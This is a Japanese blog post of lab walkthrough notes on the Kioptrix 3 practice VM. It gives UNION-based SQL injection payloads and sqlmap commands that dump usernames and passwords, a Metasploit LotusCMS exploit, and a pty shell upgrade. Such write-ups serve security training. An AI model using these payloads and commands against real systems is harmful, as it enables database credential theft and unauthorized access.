参考文献 

参考文献に以下を使用させていただきました

qiita.com

まとめ（途中）

docs.google.com

簡易ルート

etc/hostsにホストを追加

nikto, dirbで/gallary/, /phpmyadmin/の存在を確認

index.phpにBlog, Loginページの存在を確認

Blogページの投稿されている記事を確認

LoginページにてCMSがLotusCMSであることを確認

phpmyadminのページでadmin/""でログインできることを確認

phpmyadminのログイン後、一部テーブルがみれることを確認

gallaryページに遷移し、webサイトの存在を確認

A.直接SQLインジェクション

gallary,phpページで?id=1を入れることで、エラー表示することを確認

gallary,phpページで?id=""を入れることで、上記エラーが解消されることを確認

.php?id=-1 union select 1,2,3,4,5,6--を入れることで、ページに2が表示されていることを確認

2をversion(). database(), user()などに変化させ、出力が変わることを確認

下記クエリを実行し、データベースにあるテーブルとその名前を列挙

.php?id=-1 union select 1,group_concat（table_name）,3,4,5,6 from information_schema.tables where table_schema=database()--

下記クエリを実行し、dev_accountsのデータを列挙

.php?id=-1 union select 1,group_concat（column_name）,3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)--

下記クエリを実行し、ユーザ名、PWを列挙

.php?id=-1 union select 1,group_concat（username、0x3a、password）,3,4,5,6 FROM dev_accounts--

B.sqlmapを使ったクラック

以下コマンドにて、dbを列挙

root@kali:~#sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs

以下コマンドにて、galleryDBのテーブルを列挙

root@kali:~#sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery

以下コマンドにて、ユーザ名及びPWを列挙

root @ kali：〜＃sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump

C,LotusCMSへのExploit

msfを用いて、exploit/multi/http/lcms_php_execを実行してmetapreter立ち上げ

shellおよびpythonでインタラクティブなshellを立ち上げ

python -c "import pty;pty.spawn('/bin/bash')"

ディレクトリの探索を行い、gconfig.phpにphpmyadminのrootのクレデンシャル情報を確認

探索

侵入

 流れについては記事にしました

syachineko.hatenablog.com

詳細

権限昇格

詳細

その他